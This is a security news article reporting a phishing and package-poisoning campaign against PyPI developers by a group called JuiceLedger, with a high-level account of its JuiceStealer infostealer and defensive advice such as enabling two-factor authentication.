Security researchers have identified a previously unknown group dubbed "JuiceLedger" as the threat actor behind a recent and first-known phishing campaign specifically targeting users of the Python Package Index (PyPI).

The threat actor first surfaced early this year and is focused on distributing a .NET-based malware called JuiceStealer for searching and stealing browser and cryptocurrency-related information from infected systems.

Initially, JuiceLedger distributed the information stealer via fraudulent Python installer applications. But starting in August, researchers from SentinelOne and Checkmarx observed the attacker also engaged in attempts to poison Python packages on the PyPI repository — presumably to distribute its malware to a wider audience.

The threat actor's modus operandi has involved targeting PyPI users with a phishing email informing them about Google implementing a new validation process for packages published on PyPI. The email claimed the measure was in response to a big increase in malicious PyPI packages getting uploaded to the registry. It warned developers to expeditiously validate their code packages with Google to avoid having them removed from the registry. "Packages not validated before September will be removed promptly," the phishing email noted.

PyPI users who clicked on the link were directed to a webpage, spoofed to look exactly like PyPI's login page. When users entered their credentials there, the page was designed to send that information to a JuiceLedger-controlled domain (linkedopports[dot]com). The caper appears to have convinced at least two developers to part with their credentials, which gave JuiceLedger a way to access and poison their relatively widely used PyPI packages with malicious code.

One of the infected packages (version 0.1.6 of "exotel"), for instance, had more than 480,000 total downloads at the time it was infected. The other package (versions 2.0.2 and 4.0.2 of "spam") had some 200,000 downloads. PyPI administrators have since removed both packages, according to Checkmarx.

When installed in a development environment, the code can search for Google Chrome passwords, query Chrome SQLite files, and launch a Python installer contained in the zip named “config.exe," SentinelOne said. The infostealer also looks for logs that contain the word "vault," likely because it is searching for cryptocurrency vaults, and reports the information back to an attacker-controlled command-and-control server over HTTP.

Broad Campaign

PyPI admins have also removed "several hundred" typosquatted packages that JuiceLedger published to PyPI as part of a broader effort to distribute its infostealer via the popular Python code repository, both SentinelOne and Checkmarx noted. Their analysis showed the threat actors had inserted a short code snippet in the packages for retrieving a signed variant of JuiceStealer from an attacker-controller URL and executing it.

The code in the typosquatted packages was similar to the code that JuiceLedger had inserted into the two legitimate code packages via its phishing campaign. The attacker-controlled URL that the typosquatted packages communicated with was also the same as the same the one that the poisoned versions of "exotel" and "spam" packages communicated. This allowed researchers at SentinelOne and Checkmarx to conclude JuiceLedger was responsible for both, the PyPI phishing campaign and for uploading the typosquatted packages to PyPI.

JuiceLedger's attack on PyPI in August represents a dangerous escalation in the threat actor's efforts to distribute its information stealer, SentinelOne said. "In August 2022, the threat actor engaged in poisoning open-source packages as a way to target a wider audience with the infostealer through a supply chain attack, raising the threat level posed by this group considerably."

Popular — but Not the Only — Target

PyPI recently has become a popular target for attackers trying to poison software supply chains. Countless organizations use the code published in the repository to build their applications. So, by poisoning packages on the registry, attackers can potentially reach a wide audience with relatively little effort. Recent examples include threat actors inserting malicious package installation code in 10 packages published to PyPI, another incident where some 300 developers inadvertently downloaded a package for installing Cobalt Strike from the registry and one where a school-age hacker uploaded ransomware to the registry to see what would transpire.

PyPI is by far not the only code repository that attackers have targeted recently. Security vendors have reported numerous similar incidents involving other widely used registries such as npm and Maven Central. The trend has heightened attention on software supply chain security issues, especially because of the potential for nation-state backed adversaries — like the Russian threat actor behind the SolarWinds compromise — exploiting the same tactic in their attack campaigns.

Attackers are taking advantage of the fact that developers and organizations will always need to use open source packages, says Amitai Ben, threat intelligence researcher at SentinelOne.

The best way to minimize exposure for those contributing open source code to public repositories is to enable two-factor authentication (2FA) on their user account in package managers. That minimizes the risk of account takeover by malicious actors.

Users of open source packages, meanwhile, need to know that popular packages are often connected to Git repositories from which the development process is taking place. "Discrepancies between the repository and the package on the package manager can be a sign of suspicious activity and account takeover," Ben says.